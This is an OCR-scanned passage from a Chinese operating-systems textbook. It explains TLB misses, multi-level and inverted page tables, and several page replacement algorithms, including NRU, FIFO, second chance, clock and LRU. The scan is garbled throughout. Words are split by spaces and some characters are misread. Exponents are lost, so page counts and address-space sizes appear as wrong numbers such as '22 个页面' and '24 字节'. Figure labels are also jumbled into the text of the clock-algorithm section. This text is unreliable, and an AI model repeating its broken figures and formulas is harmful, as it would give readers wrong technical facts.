的 页 面 。 用 软件 做 这 样 的 搜索 的 问题 是 ， 页 表 可 能 不 在 TLB 中 ,这 就 会 导致 处 理 过 程 中 的 额外 的 TLB 失 效 。 
可 以 通过 在 内 存 中 的 固定 位 置 维护 一 个 大 的 (如 4KB) TLB 表 项 的 软件 高 速 缓存 (该 高 速 缓存 的 页 面 一 直 
保存 在 TLB 中 ) 来 减少 TLB 失 效 。 通 过 首先 检查 软件 高 速 缓 在， 操作 系统 能 够 实质 性 地 减少 TLB 失 效 。 

当 使 用 软件 TLB 管 理 时 ， 一 个 基本 要 求 是 要 理解 两 种 不 同 的 TLB 失 效 的 区 别 在 哪里 。 当 一 个 页 面 访 
问 在 内 存 中 而 不 在 TLB 中 时 ， 将 产生 软 失效 (soft miss)。 那 么 此 时 所 要 做 的 就 是 更 新 一 下 TLB， 不 需要 
产生 磁盘 IO。 典 型 的 处 理 需 要 10~20 个 机 器 指令 并 花费 几 纳 秒 完成 操作 。 相 反 ， 当 页 面 本 身 不 在 内 存 中 
(当然 也 不 在 TLB 中 ) 时 ， 将 产生 硬 失 效 。 此 刻 需 要 一 次 磁盘 存 取 以 装 入 该 页 面 ， 这 个 过 程 大 概 需 要 几 
毫秒 。 硬 失效 的 处 理 时 间 往 往 是 软 失效 的 百 万 倍 。 在 页 表 结 构 中 查找 相应 的 映射 被 称 为 页 表 人 遍历 。 

实际 中 遇 到 的 情况 可 能 会 更 加 复杂 ， 未 命中 的 情况 可 能 既 不 是 软 失效 也 不 是 硬 失 效 。 一 些 未 命中 相 
比 其 他 未 命中 会 更 “ 软 ”( 或 更 “ 硬 " ) 。 举 例 来 说 ， 假 设 页 表 遍 历 没 有 在 进程 的 页 表 中 找到 需要 的 页 ， 从 
而 引发 了 一 个 缺 页 错误 ， 那 么 这 时 有 三 种 可 能 。 第 一 种 ， 所 需 的 页 面 可 能 就 在 内 存 中 ， 但 却 未 记录 在 该 
进程 的 页 表 里 。 比 如 该 页 面 可 能 已 由 其 他 进程 从 硬盘 中 调 入 内 存 ， 这 种 情况 下 只 需要 把 所 需 的 页 面 正确 
映射 到 页 表 中 ， 而 不 用 再 从 硬盘 调 人 。 这 是 一 种 典型 的 软 失效 ， 称 为 次 要 缺 页 错误 。 第 二 种 ， 如 果 需 要 
从 硬盘 重新 调和 人 页面， 这 就 是 严重 缺 页 错误 。 第 三 种 ， 程 序 可 能 访问 了 一 个 非法 地 址 ， 根 本 不 需要 向 TLB 
中 新 增 映射 。 此 时 ， 操 作 系 统一 般 会 通过 报告 段 错误 来 终止 该 程序 。 只 有 第 三 种 缺 页 属于 程序 错误 ， 其 
他 缺 页 情况 都 会 被 硬件 或 操作 系统 以 降低 性 能 为 代价 而 自动 修复 。 


3.3.4 针对 大 内 存 的 页 表 

在 原 有 的 内 存 页 表 的 方案 之 上 ， 引 入 TLB 可 以 加 快 虚拟 地 址 到 物理 地 址 的 转换 。 不 过 这 不 是 唯一 需 
要 解决 的 问题 。 另 一 个 问题 是 怎样 处 理 巨 大 的 虚拟 地 址 空间 。 下 面 将 讨论 两 种 解决 方法 。 

1. 多 级 页 表 

第 一 种 方法 是 采用 多 级 页 表 。 一 个 简单 的 例子 如 图 3-13 所 示 。 在 图 3-13a 中 ，32 位 的 虚拟 地 址 被 划 
分 为 10 位 的 PT1 域 、10 位 的 PT2 域 和 12 位 的 Offset (WE) 域 。 因 为 偏 移 量 是 12 位 ， 所 以 页 面 大 小 是 
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4KB, ， 共 有 22 个 页 面 。 

引入 多 级 页 表 的 原因 是 避免 把 全 部 页 表 一 直 保存 在 内 存 中 。 特 别 是 那些 从 不 需要 的 页 表 就 不 应 该 保 
留 。 比 如 一 个 需要 12MB 内 存 的 进程 ， 其 最 底 端 是 4MB 的 程序 正文 段 ， 后 面 是 4MB 的 数据 段 ， 顶 端 是 
4MB 的 堆栈 段 ， 在 数据 段 上 方 和 堆栈 段 下 方 之 间 是 大 量 根本 没有 使 用 的 空闲 区 。 

考察 图 3-13b 中 的 二 级 页 表 是 如 何 工作 的 。 在 左边 是 顶级 页 表 ， 它 有 1024 个 表 项 ， 对 应 于 10 位 的 
PT1 域 。 当 一 个 虚拟 地 址 被 送 到 MMU 时 ，MMU 首 先 提取 PT1 域 并 把 该 值 作为 访问 顶级 页 表 的 索引 。 因 
为 整个 4GB ( 即 32 位 ) 虚拟 地 址 空间 已 经 按 4KB 大 小 分 块 ， 所 以 顶级 页 表 中 这 1024 个 表 项 的 每 一 个 都 表 


示 4M 的 块 地 址 范围 。 
内 存 顶 部 4M 
块 的 页 表 
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图 3-13 a) 一 个 有 两 个 页 表 域 的 32 位 地 位 ，b) 二 级 页 表 


由 索引 顶级 页 表 得 到 的 表 项 中 含有 二 级 页 表 的 地 址 或 页 框 号 。 顶 级 页 表 的 表 项 0 指向 程序 正文 的 页 
表 ， 表 项 1 指向 数据 的 页 表 ， 表 项 1023 指 向 堆栈 的 页 表 ， 其 他 的 表 项 (用 阴影 表示 的 ) 未 用 。 现 在 把 PT2 
域 作 为 访问 选 定 的 二 级 页 表 的 索引 ， 以 便 找到 该 虚拟 页 面 的 对 应 页 框 号 。 

下 面 看 一 个 示例 ， 考 虑 32 位 虚拟 地 址 0x00403004 (十 进 制 4 206 596) 位 于 数据 部 分 12 292 字 节 处 。 
它 的 虚拟 地 址 对 应 PT1=1，PT2=3，Offset=4。MMU 首 先 用 PT1 作 为 索引 访问 顶级 页 表 得 到 表 项 1， 它 
对 应 的 地 址 范围 是 4M 到 8M 一 1。 然 后 ， 它 用 PT2 作 为 索引 访问 刚刚 找到 的 二 级 页 表 并 得 到 表 项 3， 它 对 应 
的 虚拟 地 址 范围 是 在 它 的 4M 块 内 的 12 288~16 383 ( 即 绝对 地 址 4 206 592~4 210 687)。 这 个 表 项 含有 虚 
拟 地 址 90x00403004 所 在 页 面 的 页 框 号 。 如 果 该 页 面 不 在 内 存 中 ， 页 表 项 中 的 “在 /不 在 ”位 将 是 0， 引 发 
一 次 缺 页 中 断 。 如 果 该 页 面 在 内 存 中 ， 从 二 级 页 表 中 得 到 的 页 框 号 将 与 偏 移 量 (4) 结 合 形成 物理 地 址 。 该 
地 址 被 放 到 总 线 上 并 送 到 内 存 中 。 

值得 注意 的 是 ， 虽 然 在 图 3-13 中 虚拟 地 址 空间 超过 100 万 个 页 面 ， 实 际 上 只 需要 四 个 页 表 : 顶级 页 表 


b) 
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以 及 0~4M (正文 段 )、4M~8M (数据 段 ) 和 顶端 4M (堆栈 段 ) 的 二 级 页 表 。 顶 级 页 表 中 1021 个 表 项 的 
“在 /不 在 ”位 都 被 设 为 0， 当 访问 它们 时 强制 产生 一 个 缺 页 中 断 。 如 果 发 生 了 这 种 情况 ， 操 作 系 统 将 注 
意 到 进程 正在 试图 访问 一 个 不 希望 被 访问 的 地 址 ， 并 采取 适当 的 行动 ， 比 如 向 进程 发 出 一 个 信号 或 杀 死 
进程 等 。 在 这 个 例子 中 的 各 种 长 度 选 择 的 都 是 整数 ， 并 且 选 择 PT1 与 PT2 等 长 ， 但 在 实际 中 也 可 能 是 其 
他 的 值 。 

图 3-13 所 示 的 二 级 页 表 可 扩充 为 三 级 、 四 级 或 更 多 级 。 级 数 越 多 ， 灵 活性 就 越 大 。 举 例 来 说 ，Intel 
在 1985 年 推出 的 32 位 处 理 器 80386 的 寻 址 空间 就 多 达 4GB 。 它 采用 包含 页 目录 的 二 级 页 表 机 制 ， 页 目录 
中 的 项 指向 页 表 ， 页 表 项 再 指向 真实 大 小 为 4KB 的 页 框 。 页 目录 和 页 表 都 包含 1024 个 表 项 ， 这 样 就 可 以 
像 预 期 的 一 样 ， 一 共 可 以 提供 2”x2"”x2”= 22 个 可 寻 址 字 节 。 

十 年 后 ， 高 性 能 奔腾 处 理 器 推出 了 另 一 种 寻 址 实现 形式 : 页 目录 指针 表 。 此 外 ， 它 每 一 级 的 页 表 项 
由 32 位 扩展 到 了 64 位 ， 这 样 处 理 器 就 能 寻 址 到 4GB 以 外 的 地 址 空间 。 由 于 在 每 个 页 目录 指针 表 中 只 有 4 
条 目录 ， 因 此 每 个 页 目录 表 中 有 512 个 条 目 ， 每 个 页 表 中 也 只 有 512 个 条 目 ， 这 样 总 的 寻 址 空间 依然 被 限 
定 在 4GB 以 内 。 当 x86 系 列 支 持 64 位 后 (最初 由 AMD 实 现 )， 附 加 的 一 层 表 结构 本 可 以 被 称 作 “ 页 目录 
指针 表 指 针 ” 或 类 似 的 令 人 生 厌 的 名 字 。 这 与 芯片 制造 者 的 常用 命名 规则 非常 匹配 ， 不 过 好 在 他 们 为 其 
取 了 另 一 个 名 字 一 一 4 级 页 表 ， 这 个 名 字 可 能 不 那么 吸引 人 ， 但 至 少 简短 而 明确 。 现 在 ， 这 些 处 理 器 在 
页 表 中 都 使 用 512 个 条 目 ， 可 寻 址 空间 达到 了 2? 2”x 2x 2”x 2” = 24 字 节 ， 共 256TB 大 小 的 内 存 空间 可 
以 够 用 相当 长 一 段 时 间 ， 因 此 芯片 制造 者 没有 再 多 加 一 层 页 。 

2. 倒 排 页 表 

针对 页 式 调度 层级 不 断 增长 的 另 一 种 解决 方案 是 倒 排 页 表 (inverted page table)， 首 先 采 用 这 种 解 
决 方案 的 处 理 器 有 PowerPC、UltraSPARC 和 Itanium (有 时 也 被 称 作 Itanic， 这 款 处 理 器 并 没有 达到 Intel 
所 期 望 的 目标 )。 在 这 种 设计 中 ， 实 际 内 存 中 的 每 个 页 框 对 应 一 个 表 项 ， 而 不 是 每 个 虚拟 页 面 对 应 一 个 
表 项 。 例 如 ， 对 于 64 位 虚拟 地 址 ，4KB 的 页 ，4GB 的 RAM， 一 个 倒 排 页 表 仅 需 要 1 048 576 个 表 项 。 表 项 
记录 了 哪 一 个 (进程 ， 虚 拟 页 面 ) 对 定位 于 该 页 框 。 

虽然 倒 排 页 表 节 省 了 大 量 的 空间 (至 少 当 虚拟 地 址 空间 比 物理 内 存 大 得 多 的 时 候 是 这 样 的 )， 但 它 
也 有 严重 的 不 足 : 从 虚拟 地 址 到 物理 地 址 的 转换 会 变 得 很 困难 。 当 进程 ”访问 虚拟 页 面 p 时 ， 硬 件 不 再 能 
通过 把 p 当 作 指 向 页 表 的 一 个 索引 来 查找 物理 页 框 。 取 而 代 之 的 是 ， 它 必须 搜索 整个 倒 排 页 表 来 查找 某 
一 个 表 项 (n，p)。 此 外 ， 该 搜索 必须 对 每 一 个 内 存 访问 操作 都 要 执行 一 次 ， 而 不 仅仅 是 在 发 生 缺 页 中 
断 时 执行 。 每 次 内 存 访问 操作 都 要 查找 一 个 256K 的 表 不 是 一 种 使 机 器 快速 运行 的 方法 。 

走出 这 种 两 难 局 面 的 办 法 是 使 用 TLB。 如 果 TLB 能 够 记录 所 有 频繁 使 用 的 页 面 ， 地 址 转换 就 可 能 变 
得 像 通常 的 页 表 一 样 快 。 但 是 ， 当 发 生 TLB 失 效 时 ， 需 要 用 软件 搜索 整个 倒 排 页 表 。 实 现 该 搜索 的 一 个 
可 行 的 方法 是 建立 一 张 散 列表 ， 用 虚拟 地 址 来 散 列 。 当 前 所 有 在 内 存 中 的 具有 相同 散 列 值 的 虚拟 页 面 被 
链接 在 一 起 ， 如 图 3-14 所 示 。 如 果 散 列表 中 的 权 数 与 机 器 中 物理 页 面 数 一 样 多 ， 那 么 散 列 表 的 冲突 链 的 
平均 长 度 将 会 是 1 个 表 项 的 长 度 ， 这 将 会 大 大 提高 映射 速度 。 一 旦 页 框 号 被 找到 ， 新 的 (虚拟 页 号 ， 物 
理 页 框 号 ) 对 就 会 被 装载 到 TLB 中 。 


传统 页 表 ， 每 页 一 个 
页 表 项 ， 共 2” 个 页 面 
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以 虚拟 页 面 对 虚拟 页 面 进行 散 列 
作为 索引 计算 ， 并 作为 索引 THE 


图 3-14 传统 页 表 与 倒 排 页 表 的 对 比 
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倒 排 页 表 在 64 位 机 器 中 很 常见 , 因为 在 64 位 机 器 中 即使 使 用 了 大 页 面 , 页 表 项 的 数量 还 是 很 庞大 的 。 
例如 ， 对 于 4MB 页 面 和 64 位 虚拟 地 址 ， 需 要 2*“ 个 页 表 项 。 处 理 大 虚 存 的 其 他 方法 可 参见 Talluri 等 人 
(1995) 的 论文 。 


3.4 页 面 置 换算 法 


当 发 生 缺 页 中 断 时 ， 操 作 系统 必须 在 内 存 中 选择 一 个 页 面 将 其 换 出 内 存 ， 以 便 为 即将 调 人 的 页 面 腾 
出 空间 。 如 果 要 换 出 的 页 面 在 内 存 驻 留 期 间 已 经 被 修改 过 ， 就 必须 把 它 写 回 磁盘 以 更 新 该 页 面 在 磁盘 上 
的 副本 ， 如 果 该 页 面 没 有 被 修改 过 (如 一 个 包含 程序 正文 的 页 面 )， 那 么 它 在 磁盘 上 的 副本 已 经 是 最 新 
的 ， 不 需要 回 写 。 直 接 用 调 人 的 页 面 覆盖 被 淘汰 的 页 面 就 可 以 了 。 

当 发 生 缺 页 中 断 时 ， 虽 然 可 以 随机 地 选择 一 个 页 面 来 置换 ， 但 是 如 果 每 次 都 选择 不 常 使 用 的 页 面 会 
提升 系统 的 性 能 。 如 果 一 个 被 频繁 使 用 的 页 面 被 置换 出 内 存 ， 很 可 能 它 在 很 短 时 间 内 又 要 被 调和 内 存 ， 
这 会 带 来 不 必要 的 开销 。 人 们 已 经 从 理论 和 实践 两 个 方面 对 页 面 置换 算法 进行 了 深入 的 研究 。 下 面 我 们 
将 介绍 几 个 最 重要 的 算法 。 

有 必要 指出 ,“ 页 面 置换 ”问题 在 计算 机 设计 的 其 他 领域 中 也 同样 会 发 生 。 例 如 ， 多 数 计算 机 把 最 
近 使 用 过 的 32 字 节 或 64 字 节 的 存储 块 保存 在 一 个 或 多 个 高 速 缓存 中 。 当 这 些 高 速 缓存 存 满 之 后 就 必须 选 
择 一 些 块 丢 掉 。 除 了 花费 时 间 较 短 外 (有 关 操 作 必 须 在 几 纳 秒 内 完成 ， 而 不 是 像 页 面 置换 那样 在 微 秒 级 
上 完成 )， 这 个 问题 同 页 面 置 换 问 题 完 全 一 样 。 之 所 以 花费 时 间 较 短 ， 其 原因 是 丢掉 的 高 速 缓存 块 可 以 
从 内 存 中 获得 ， 而 内 存 既 没有 寻 道 时 间 也 不 存在 旋转 延迟 。 

第 二 个 例子 是 Web 服 务 器 。 服 务 器 可 以 把 经 常 访问 的 一 些 Web 页 面 存放 在 存储 器 的 高 速 缓 存 中 。 但 
是 ， 当 存储 器 高 速 缓 存 已 满 并 且 要 访问 一 个 不 在 高 速 缓 存 中 的 页 面 时 ， 就 必须 要 置换 高 速 缓 存 中 的 某 个 
Web 页 面 。 在 高 速 缓存 中 的 Web 页 面 不 会 被 修改 ， 因 此 在 磁盘 中 的 Web 页 面 的 副本 总 是 最 新 的 ， 而 在 虚 
拟 存储 系统 中 ， 内 存 中 的 页 面 既 可 能 是 干净 页 面 也 可 能 是 脏 页 面 ， 除 了 这 一 点 不 同 之 外 ， 置 换 Web 页 面 
和 置换 虚拟 内 存 中 的 页 面 需要 考虑 的 问题 是 类 似 的 。 

在 接 下 来 讨论 的 所 有 页 面 置换 算法 中 都 存在 一 个 问题 : 当 需 要 从 内 存 中 换 出 某 个 页 面 时 ， 它 是 否 只 
能 是 缺 页 进程 自己 的 页 面 ? 这 个 要 换 出 的 页 面 是 否 可 以 属于 另外 一 个 进程 ? 在 前 一 种 情况 下 ， 可 以 有 效 
地 将 每 一 个 进程 限定 在 固定 的 页 面 数目 内 ， 后 一 种 情况 则 不 能 。 这 两 种 情况 都 是 可 能 的 。 在 3.5.1 节 我 们 
会 继续 讨论 这 一 点 。 


3.4.1 最 优 页 面 置换 算法 

很 容易 就 可 以 描述 出 最 好 的 页 面 置 换算 法 ， 虽 然 此 算法 不 可 能 实现 。 该 算法 是 这 样 工作 的 : 在 缺 页 
中 断 发 生 时 ， 有 些 页 面 在 内 存 中 ， 其 中 有 一 个 页 面 (包含 紧 接 着 的 下 一 条 指令 的 那个 页 面 ) 将 很 快 被 访 
问 ， 其 他 页 面 则 可 能 要 到 10、100 或 1000 条 指令 后 才 会 被 访问 ， 每 个 页 面 都 可 以 用 在 该 页 面 首次 被 访问 
前 所 要 执行 的 指令 数 作 为 标记 。 

最 优 页 面 置换 算法 规定 应 该 置换 标记 最 大 的 页 面 。 如 果 一 个 页 面 在 800 万 条 指令 内 不 会 被 使 用 ， 另 
外 一 个 页 面 在 600 万 条 指令 内 不 会 被 使 用 ， 则 置换 前 一 个 页 面 ， 从 而 把 因 需 要 调 入 这 个 页 面 而 发 生 的 缺 
页 中 断 推 迟到 将 来 ， 越 久 越 好 。 计 算 机 也 像 人 一 样 ， 希 望 把 不 愉快 的 事情 尽 可 能 地 往 后 拖延 。 

这 个 算法 唯一 的 问题 就 是 它 是 无 法 实现 的 。 当 缺 页 中 断 发 生 时 ， 操 作 系 统 无 法 知道 各 个 页 面 下 一 次 
将 在 什么 时 候 被 访问 。( 在 最 短 作业 优先 调度 算法 中 ， 我 们 曾 遇 到 同样 的 情况 ， 即 系统 如 何 知 道 哪 个 作 
业 是 最 短 的 呢 ? ) 当然 ， 通 过 首先 在 仿真 程序 上 运行 程序 ， 跟 踪 所 有 页 面 的 访问 情况 ， 然 后 在 第 二 次 运 
行 时 利用 第 一 次 运行 时 收集 的 信息 是 可 以 实现 最 优 页 面 置 换算 法 的 。 

用 这 种 方式 ， 可 以 通过 最 优 页 面 置 换算 法 对 其 他 可 实现 算法 的 性 能 进行 比较 。 如 果 操 作 系 统 达 到 的 
页 面 置 换 性 能 只 比 最 优 算法 差 1%， 那 么 即使 花费 大 量 的 精力 来 寻找 更 好 的 算法 最 多 也 只 能 换 来 1% 的 性 
能 提高 。 

为 了 避免 混淆， 读者 必须 清楚 以 上 页 面 访问 情况 的 记录 只 针对 刚刚 被 测试 过 的 程序 和 它 的 一 个 特定 的 
输入 ， 因 此 从 中 导出 的 性 能 最 好 的 页 面 置换 算法 也 只 是 针对 这 个 特定 的 程序 和 输入 数据 的 。 虽 然 这 个 方法 
对 评价 页 面 置换 算法 很 有 用 ， 但 它 在 实际 系统 中 却 不 能 使 用 。 下 面 将 研究 可 以 在 实际 系统 中 使 用 的 算法 。 
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3.4.2 最 近 未 使 用 页 面 置换 算法 

为 使 操作 系统 能 够 收集 有 用 的 统计 信息 ， 在 大 部 分 具有 虚拟 内 存 的 计算 机 中 ， 系 统 为 每 一 页 面 设置 
了 两 个 状态 位 。 当 页 面 被 访问 ( 读 或 写 ) 时 设置 R 位 ， 当 页 面 被 写 入 〈 即 修改 ) 时 设置 M 人 位。 这些 位 包 
含 在 每 个 页 表 项 中 ， 如 图 3-11 所 示 。 每 次 访问 内 存 时 更 新 这 些 位 ， 因 此 由 硬件 来 设置 它们 是 必要 的 。 一 
且 设 置 某 位 为 1， 它 就 一 直 保 持 1 直 到 操作 系统 将 它 复位 。 

如 果 硬 件 没有 这 些 位 ， 则 可 以 使 用 操作 系统 的 缺 页 中 断 和 时 钟 中 断 机 制 进行 以 下 的 模拟 : 当 启 动 一 
个 进程 时 ， 将 其 所 有 的 页 面 都 标记 为 不 在 内 存 ， 一 旦 访问 任何 一 个 页 面 就 会 引发 一 次 缺 页 中 断 ， 此 时 操 
作 系 统 就 可 以 设置 R 位 (在 它 的 内 部 表 中 ) ， 修 改 页 表 项 使 其 指向 正确 的 页 面 ， 并 设 为 READ ONLY 模 式 ， 
然后 重新 启动 引起 缺 页 中 断 的 指令 ， 如 果 随 后 对 该 页 面 的 修改 又 引发 一 次 缺 页 中 断 ， 则 操作 系统 设置 这 
个 页 面 的 M 位 并 将 其 改 为 READ/WRITE 模 式 。 

可 以 用 R 位 和 M 位 来 构造 一 个 简单 的 页 面 置换 算法 : 当 启 动 一 个 进程 时 ， 它 的 所 有 页 面 的 两 个 位 都 
由 操作 系统 设置 成 0，R 位 被 定期 地 (比如 在 每 次 时 钟 中 断 时 ) 清 零 ， 以 区 别 最 近 没有 被 访问 的 页 面 和 被 
访问 的 页 面 。 

当 发 生 缺 页 中 断 时 ， 操 作 系 统 检查 所 有 的 页 面 并 根据 它们 当前 的 R 位 和 M 位 的 值 ， 把 它们 分 为 4 类 : 

。 第 0 类 : 没有 被 访问 ， 没 有 被 修改 。 

。 第 1 类 : 没有 被 访问 ， 已 被 修改 。 

。 第 2 类 : 已 被 访问 ， 没 有 被 修改 。 

。 第 3 类 : 已 被 访问 ， 已 被 修改 。 
尽管 第 1 类 初 看 起 来 似乎 是 不 可 能 的 ， 但 是 一 个 第 3 类 的 页 面 在 它 的 R 位 被 时 钟 中 断 清 零 后 就 成 了 第 1 类 。 
时 钟 中 断 不 清除 M 位 是 因为 在 决定 一 个 页 面 是 否 需要 写 回 磁盘 时 将 用 到 这 个 信息 。 清 除 R 位 而 不 清除 M 
位 产生 了 第 1 类 页 面 。 

NRU (Not Recently Used， 最 近 未 使 用 ) 算法 随机 地 从 类 编号 最 小 的 非 空 类 中 挑选 一 个 页 面 淘汰 。 
这 个 算法 隐 含 的 意思 是 ， 在 最 近 一 个 时 钟 滴答 中 (典型 的 时 间 是 大 约 20ms) 淘 法 一 个 没有 被 访问 的 已 修 
改 页 面 要 比 淘汰 一 个 被 频繁 使 用 的 “干净 ”页 面 好 。NRU 的 主要 优点 是 易于 理解 和 能 够 有 效 地 被 实现 ， 
虽然 它 的 性 能 不 是 最 好 的 ， 但 是 已 经 够 用 了 。 


3.4.3 先进 先 出 页 面 置 换算 法 

另 一 种 开销 较 小 的 页 面 置换 算法 是 FIFO (First-In First-Out， 先 进 先 出 ) 算法 。 为 了 解释 它 是 怎样 
工作 的 ， 设 想 有 一 个 超市 ， 它 有 足够 的 货架 展示 k 种 不 同 的 商品 。 有 一 天 ， 某 家 公司 介绍 了 一 种 新 的 方 
便 食品 一 一 即食 的 、 冷 冻 和 干燥 的 、 可 以 用 微波 炉 加 热 的 酸 乳 酪 ， 这 个 产品 非常 成 功 ， 所 以 容量 有 限 的 超 
市 必须 撤 掉 一 种 旧 的 商品 以 便 能 够 展示 该 新 产品 。 

一 种 可 能 的 解决 方法 就 是 找到 该 超市 中 库存 时 间 最 长 的 商品 并 将 其 替换 掉 (比如 某 种 120 年 以 前 就 
开始 卖 的 商品 ) ， 理 由 是 现在 已 经 没有 人 喜欢 它 了 。 这 实际 上 相当 于 超市 有 一 个 按照 引进 时 间 排 列 的 所 
有 商品 的 链表 。 新 的 商品 被 加 到 链表 的 尾部 ， 链 表 头 上 的 商品 则 被 撤 掉 。 

同样 的 思想 也 可 以 应 用 在 页 面 置 换算 法 中 。 由 操作 系统 维护 一 个 所 有 当前 在 内 存 中 的 页 面 的 链表 ， 
最 新 进入 的 页 面 放 在 表 尾 ， 最 早 进入 的 页 面 放 在 表 头 。 当 发 生 缺 页 中 断 时 ， 淘 汰 表 头 的 页 面 并 把 新 调 人 
的 页 面 加 到 表 尾 。 当 FIFO 用 在 超市 时 ， 可 能 会 淘汰 剃 须 膏 ， 但 也 可 能 淘汰 面粉 、 盐 或 黄油 这 一 类 常用 商 
品 。 因 此 ， 当 它 应 用 在 计算 机 上 时 也 会 引起 同样 的 问题 ， 由 于 这 一 原因 ， 很 少 使 用 纯粹 的 FIFO 算 法 。 


3.4.4 第 二 次 机 会 页 面 置 换算 法 

FIFO 算 法 可 能 会 把 经 常 使 用 的 页 面 置换 出 去 ， 为 了 避免 这 一 问题 ， 对 该 算法 做 一 个 简单 的 修改 ， 
检查 最 老 页 面 的 R 位 。 如 果 R 位 是 0， 那 么 这 个 页 面 既 老 又 没有 被 使 用 ， 可 以 立刻 置换 掉 ， 如 果 是 1， 就 
将 R 位 清 0， 并 把 该 页 面 放 到 链表 的 尾 端 ， 修 改 它 的 装 入 时 间 使 它 就 像 刚 装 入 的 一 样 ， 然 后 继续 搜索 。 

这 一 算法 称 为 第 二 次 机 会 (second chance) 算法 ， 如 图 3-15 所 示 。 在 图 3-15a 中 可 以 看 到 页 面 A 到 页 
面 H 按 照 进 入 内 存 的 时 间 顺 序 保存 在 链表 中 。 

假设 在 时 刻 20 处 发 生 了 一 次 缺 页 中 断 。 这 时 最 老 的 页 面 是 A， 它 是 在 时 刻 0 到 达 的 。 如 果 A 的 R 位 是 
0， 则 将 它 淘汰 出 内 存 ， 或 者 把 它 写 回 磁盘 (如果 它 已 被 修改 过 )， 或 者 只 是 简单 地 放弃 (如果 它 是 “ 干 
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净 ” 的 ) ， 男 一 方面 ， 如 果 其 R 位 已 经 设置 了 ， 则 将 A 放 到 链表 的 尾部 并 且 重 新 设置 “ 装 和 人 时间” 为 当 
前 时 刻 〈20) ， 然 后 清除 R 位 。 然 后 从 B 页 面 开始 继续 搜索 合适 的 页 面 。 


先 被 装 入 
的 页 面 


图 3-15 第 二 次 机 会 算法 的 操作 (页面 上 面 的 数字 是 装 入 时 间 ): a) 按 先 进 先 出 的 方法 排列 的 页 面 ，b) 在 时 
刻 20 处 发 生 缺 页 中 断 并 且 A 的 R 位 已 经 设置 时 的 页 面 链表 


第 二 次 机 会 算法 就 是 寻找 一 个 在 最 近 的 时 钟 间隔 内 没有 被 访问 过 的 页 面 。 如 果 所 有 的 页 面 都 被 访问 
过 了 , 该 算法 就 简化 为 纯粹 的 FIFO 算 法 。 特 别 地 ,想象 一 下 ,假设 图 3-15a 中 所 有 页 面 的 R 位 都 被 设置 了 ， 
操作 系统 将 会 一 个 接 一 个 地 把 每 个 页 面 都 移动 到 链表 的 尾部 并 清除 被 移动 的 页 面 的 R 位 。 最 后 算法 又 将 
回 到 页 面 A， 此 时 它 的 R 位 已 经 被 清除 了 ， 因 此 A 页 面 将 被 淘汰 ， 所 以 这 个 算法 总 是 可 以 结束 的 。 


3.4.5 时 钟 页 面 置 换算 法 
尽管 第 二 次 机 会 算法 是 一 个 比较 合理 的 算法 ， 但 它 经 常 要 在 链表 中 移动 页 面 ， 既 降低 了 效率 又 不 是 
很 有 必要 。 一 个 更 好 的 办 法 是 把 所 有 的 页 面 都 


保存 在 一 个 类 似 钟 面 的 环形 链表 中 ， 一 个 表 针 [4] 
指向 最 老 的 页 面 ， 如 图 3-16 所 示 。 

当 发 生 缺 页 中 断 时 ， 算 法 首先 检查 表 针 指 当 发 生 缺 页 中 断 时 ， 检 
向 的 页 面 ， 如 果 它 的 R 位 是 0 就 淘汰 该 页 面 ， 并 查 表 针 指向 的 页 面 。 根 
把 新 的 页 面 插入 这 个 位 置 ， 然 后 把 表 针 前 移 一 [0] 者 R 位 采取 动作 
个 位 置 ， 如 果 R 位 是 1 就 清除 R 位 并 把 表 针 前 移 ede 
一 个 位 置 。 重 复 这 个 过 程 直 到 找到 了 一 个 R 位 C] [E] eae 
为 0 的 页 面 为 止 。 了 解 了 这 个 算法 的 工作 方式 ， 
就 明白 为 什么 它 被 称 为 时 钟 (clock) 算法 了 。 [e] 
346 最 近 最 少 使 用 页 面 置 换算 法 图 3-16 时 钟 页 面 置换 算法 


对 最 优 算法 的 一 个 很 好 的 近似 是 基于 这 样 
的 观察 : 在 前 面 几 条 指令 中 频繁 使 用 的 页 面 很 可 能 在 后 面 的 几 条 指令 中 被 使 用 。 反 过 来 说 ， 已 经 很 久 设 
有 使 用 的 页 面 很 有 可 能 在 未 来 较 长 的 一 段 时 间 内 仍然 不 会 被 使 用 。 这 个 思想 提示 了 一 个 可 实现 的 算法 : 
在 缺 页 中 断 发 生 时 ， 置 换 未 使 用 时 间 最 长 的 页 面 。 这 个 策略 称 为 LRU (Least Recently Used， 最 近 最 少 
使 用 ) 页 面 置 换算 法 。 

虽然 LRU 在 理论 上 是 可 以 实现 的 ， 但 代价 很 高 。 为 了 完全 实现 LRU， 需 要 在 内 存 中 维护 一 个 所 有 页 
面 的 链表 ， 最 近 最 多 使 用 的 页 面 在 表 头 ， 最 近 最 少 使 用 的 页 面 在 表 尾 。 困 难 的 是 在 每 次 访问 内 存 时 都 必 
须要 更 新 整个 链表 。 在 链表 中 找到 一 个 页 面 ， 删 除 它 ， 然 后 把 它 移动 到 表 头 是 一 个 非常 费时 的 操作 ， 即 
使 使 用 硬件 实现 也 一 样 费时 (假设 有 这 样 的 硬件 )。 

然而 ， 还 是 有 一 些 使 用 特殊 硬件 实现 LRU 的 方法 。 首 先 考 虑 一 个 最 简单 的 方法 ， 这 个 方法 要 求 硬件 
有 一 个 64 位 计数 器 C， 它 在 每 条 指令 执行 完 后 自动 加 1， 每 个 页 表 项 必须 有 一 个 足够 容纳 这 个 计数 器 值 的 
域 。 在 每 次 访问 内 存 后， 将 当前 的 C 值 保存 到 被 访问 页 面 的 页 表 项 中 。 一 旦 发 生 缺 页 中 断 ， 操 作 系统 就 
检查 所 有 页 表 项 中 计数 器 的 值 ， 找 到 值 最 小 的 一 个 页 面 ， 这 个 页 面 就 是 最 近 最 少 使 用 的 页 面 。 
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3.4.7 用 软件 模拟 LRU 

前 面 一 种 LRU 算 法 虽然 在 理论 上 是 可 以 实现 的 ， 但 只 有 非常 少 的 计算 机 拥有 这 种 硬件 。 因 此 ， 需 要 
一 个 能 用 软件 实现 的 解决 方案 。 一 种 可 能 的 方案 称 为 NFU (Not Frequently Used， 最 不 常用 ) 算法 。 该 
算法 将 每 个 页 面 与 一 个 软件 计数 器 相关 联 ， 计 数 器 的 初 值 为 0。 每 次 时 钟 中 断 时 ， 由 操作 系统 扫描 内 存 
中 所 有 的 页 面 ， 将 每 个 页 面 的 R 位 ( 它 的 值 是 0 或 1) 加 到 它 的 计数 器 上 。 这 个 计数 器 大 体 上 跟踪 了 各 个 
页 面 被 访问 的 频繁 程度 。 发 生 缺 页 中 断 时 ， 则 置换 计数 器 值 最 小 的 页 面 。 

